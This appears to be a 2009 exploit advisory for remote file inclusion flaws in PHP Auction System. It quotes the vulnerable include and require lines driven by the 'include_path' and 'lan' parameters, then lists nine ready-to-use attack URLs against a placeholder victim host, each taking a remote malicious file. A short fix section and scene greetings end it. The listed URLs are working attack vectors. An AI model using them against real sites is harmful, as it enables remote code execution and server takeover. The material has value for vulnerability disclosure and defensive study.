[»]=======================================================================================================[_][-][X] [»] [»] [»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»] [»] [»] [»] ======= ------d-------m------ ==== ==== [»] [»] || = | |(o o)| | || || || [»] [»] || = ||(~)|| || || [»] [»] ======= /|\ || || [»] [»]=============================================================================================================[»] [»] Author : ~darkmasking~ [»] [»] Date : January, 6th 2009 [»] [»] Web : https://www.idsafeshield.com [»] [»] Contact : support[at]idsafeshield[dot]com [»] [»] Critical Level : Dangerous [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] Affected software description : [»] [»] Software : PHP Auction System [»] [»] Vendor : http://www.phpauctions.info/ [»] [»] Price : $59.99 [»] [»]=============================================================================================================[»] [»] [»] [»] [~] Vulnerable file [»] [»] [»] [»] [+] all file below is affected by "include_path" parameter [»] [»] [»] [»] ./includes/settings.inc.php [»] [»] $password_file = $include_path."passwd.inc.php"; [»] [»] include($password_file); [»] [»] include $include_path."fonts.inc.php"; [»] [»] include $include_path."fontsize.inc.php"; [»] [»] include($include_path."currency.inc.php"); [»] [»] include($include_path."errors.inc.php"); [»] [»] include($include_path."https.inc.php"); [»] [»] [»] [»] ./includes/auction_confirmation.inc.php [»] [»] require("./includes/messages.inc.php"); [»] [»] [»] [»] ./includes/converter.inc.php [»] [»] include($include_path."nusoap.php"); [»] [»] [»] [»] ./includes/messages.inc.php [»] [»] require($include_path.'messages.'.$language.'.inc.php'); [»] [»] [»] [»] ./includes/stats.inc.php [»] [»] include $prefix."includes/useragent.inc.php"; [»] [»] include $prefix."includes/domains.inc.php"; [»] [»] [»] [»] ./includes/useragent.inc.php [»] [»] include $prefix."includes/browsers.inc.php"; [»] [»] include $prefix."includes/platforms.inc.php"; [»] [»] [»] [»] ./includes/user_confirmation.inc.php [»] [»] require("./includes/messages.inc.php"); [»] [»] [»] [»] [»] [»] [+] All file below is affected by "lan" parameter [»] [»] [»] [»] ./browse.php [»] [»] ./search.php [»] [»] if(!empty($_GET['lan'])) { [»] [»] $language = $lan; [»] [»] $_SESSION['language'] = $language; [»] [»] [»] [»] #// Set language cookie [»] [»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»] [»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»] [»] $language = $SETTINGS['defaultlanguage']; [»] [»] $_SESSION['language'] = $language; [»] [»] [»] [»] #// Set language cookie [»] [»] setcookie("USERLANGUAGE",$language,time()+31536000); [»] [»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»] [»] $language = $_COOKIE['USERLANGUAGE']; [»] [»] } [»] [»] [»] [»] require($include_path.'messages.'.$language.'.inc.php'); [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Exploit [»] [»] [»] [»] [+] "include_path" parameter [»] [»] [»] [»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»] [»] [»] [»] [»] [»] [+] "lan" parameter [»] [»] [»] [»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»] [»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] How to fix this vulnerability [»] [»] [»] [»] Edit the source code to ensure that input is properly validated. Where is possible, [»] [»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»] [»] [»] [»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»] [»] include or otherwise use a remote file using a URL rather than a local file path. [»] [»] It is recommended to disable this option from php.ini. [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Greetz [»] [»] [»] [»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»] [»] [»] [»] [»] [»]=============================================================================================================[»]